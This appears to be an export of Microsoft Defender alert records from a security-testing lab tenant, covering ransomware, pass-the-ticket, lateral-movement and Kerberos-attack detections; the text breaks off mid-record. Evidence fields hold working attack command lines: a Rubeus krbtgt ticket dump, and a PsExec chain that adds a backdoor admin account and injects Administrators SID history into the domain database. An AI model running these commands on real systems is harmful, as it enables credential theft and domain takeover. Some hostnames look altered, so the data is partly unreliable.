alertId stringclasses 278 values | providerAlertId stringclasses 278 values | incidentId int64 486 989 ⌀ | serviceSource stringclasses 2 values | creationTime stringdate 2022-09-30 05:04:51 2023-01-24 06:03:50 ⌀ | lastUpdatedTime stringdate 2022-11-12 01:35:42 2023-01-24 06:05:47 ⌀ | resolvedTime stringclasses 23 values | firstActivity stringdate 2022-09-07 09:25:00 2023-01-24 05:31:07 ⌀ | lastActivity stringdate 2022-09-30 05:00:00 2023-01-24 05:43:53 ⌀ | title stringclasses 62 values | description stringclasses 51 values | category stringclasses 12 values | status stringclasses 2 values | severity stringclasses 4 values | investigationId int64 20 64 ⌀ | investigationState stringclasses 9 values | classification stringclasses 1 value | determination stringclasses 1 value | detectionSource stringclasses 7 values | detectorId stringclasses 48 values | assignedTo stringclasses 3 values | actorName stringclasses 1 value | threatFamilyName stringclasses 6 values | mitreTechniques listlengths 0 8 ⌀ | devices listlengths 1 6 ⌀ | entities listlengths 0 49 ⌀ | entityType stringclasses 2 values | evidenceCreationTime stringclasses 469 values | verdict stringclasses 5 values | remediationStatus stringclasses 2 values | accountName stringclasses 30 values | domainName stringclasses 17 values | userSid stringclasses 22 values | aadUserId stringclasses 8 values | userPrincipalName stringclasses 14 values | sha1 stringclasses 28 values | sha256 stringclasses 27 values | fileName stringclasses 21 values | filePath stringclasses 13 values | processId int64 0 20.7k ⌀ | processCommandLine stringclasses 67 values | processCreationTime stringclasses 133 values | parentProcessId int64 0 14.6k ⌀ | parentProcessCreationTime stringclasses 63 values | parentProcessFileName stringclasses 14 values | parentProcessFilePath stringclasses 11 values | detectionStatus stringclasses 1 value | deviceId stringclasses 9 values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T15:35:25.87Z | Suspicious | None | darol | evilcorp.cn | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638060594419234978_-2115207275 | c9194fe2-c701-4e8e-a370-073c3f95d161 | 794 | MicrosoftDefenderForEndpoint | 2022-12-08T01:24:01.9235206Z | 2022-12-08T01:37:06.9Z | null | 2022-12-08T01:12:10.9804212Z | 2022-12-08T01:12:10.9804212Z | 'Locky' ransomware was prevented | Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Ransomware | New | Medium | 56 | PartiallyRemediated | null | null | WindowsDefenderAv | 51d03c45-b142-4de4-95df-01b0c259d8f6 | null | null | Locky | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "21H1",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-08T01:24:02.17Z",
"fileName": "TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating executable content",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": "File was created again after being remediated by antivirus",
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
aa0b733089-4ba9-428a-ac84-50ecf57ff647 | 0b733089-4ba9-428a-ac84-50ecf57ff647 | 765 | MicrosoftDefenderForIdentity | 2022-11-21T04:13:22.6244685Z | 2022-11-21T04:15:24.8966667Z | null | 2022-11-21T01:58:51.222711Z | 2022-11-21T02:33:50.093383Z | Suspected identity theft (pass-the-ticket) | An actor took Steve Lewis (IT director)'s Kerberos ticket from MSDXV2-Win10B and used it on MSDXV2-Win10V to access 3 resources. | LateralMovement | New | High | null | UnsupportedAlertType | null | null | AzureATP | PassTheTicketSecurityAlert | null | null | null | [
"T1550",
"T1550.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
},
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": null,
"accountName": "krbtgt",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T04:13:22.6633333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-502",
"verdict": "5"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T04:13:22.6633333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T04:13:22.6633333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043457307128418_307047299 | da638043457307128418_307047299 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:22:10.7130977Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:09:26.8699077Z | 2022-11-18T05:09:26.8699077Z | Possible lateral movement involving a suspicious file transfer over SMB | A device was detected transfering a suspicious file over SMB to another endpoint. An ongoing attack might be attempting to move laterally by copying implants or other payloads to other endpoints. | LateralMovement | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | MTP | 433625e1-8397-4a2e-a97d-edd4698267b2 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1570",
"T1021.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-18T05:22:10.75Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-18T05:22:10.75Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:22:10.75Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "5"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:22:11.2766667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "5"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516158347999_762408514 | 311dfa90-c3dd-4c9e-89f9-70cb338c7786 | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:20:15.8348224Z | 2022-11-12T01:35:43.1766667Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:17:35.9737654Z | 2022-11-11T08:17:35.9737654Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:15.89Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T14:43:41.8866667Z | Suspicious | None | darol | evilcorp.cn | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153567467697_2130498856 | 5b023c0b-f0fb-43b7-9699-dc97ec2e8c55 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:15:56.7467902Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:04.3376842Z | 2022-09-30T06:13:04.3382671Z | Possible use of the Rubeus kerberoasting tool | Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication.
During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets. | SuspiciousActivity | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 6606ef29-d293-4f24-a7c5-334dcb40b412 | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1558.003"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Low",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:56.7833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:15:56.7833333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-15T03:19:37.3201866Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 624,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-09-30T06:13:03.9136767Z",
"processId": 8072,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:15:56.7833333Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:13:03.9136767Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 8072,
"processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-09-30T06:13:04.078106Z",
"processId": 2224,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d",
"sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:15:57.1766667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\Temp",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:13:04.078106Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 2224,
"processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ",
"processCreationTime": "2022-09-30T06:13:04.1259063Z",
"processId": 2820,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:34.8433333Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 5,760 | netstat -an | 2022-11-21T02:02:27.7361869Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T13:31:34.26Z | Suspicious | None | darol | prod.env | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072958478304122_-1638737952 | fad7cdd3-8d17-4a8f-bae5-129fc37a24fc | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:50:47.8304325Z | 2022-12-22T08:51:24.2333333Z | null | 2022-12-22T08:47:28.9843705Z | 2022-12-22T08:48:15.5042519Z | PsExec launched a command on a remote device | PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization. | LateralMovement | New | Medium | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 40eca4c4-8854-418a-8024-fff7c9d7b077 | null | null | null | [
"T1021",
"T1021.002",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:50:47.8466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:47.8466667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:47.8466667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv8-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-12-22T08:47:53.911074Z",
"processId": 11132,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:51:24.16Z",
"fileName": "powershell.exe",
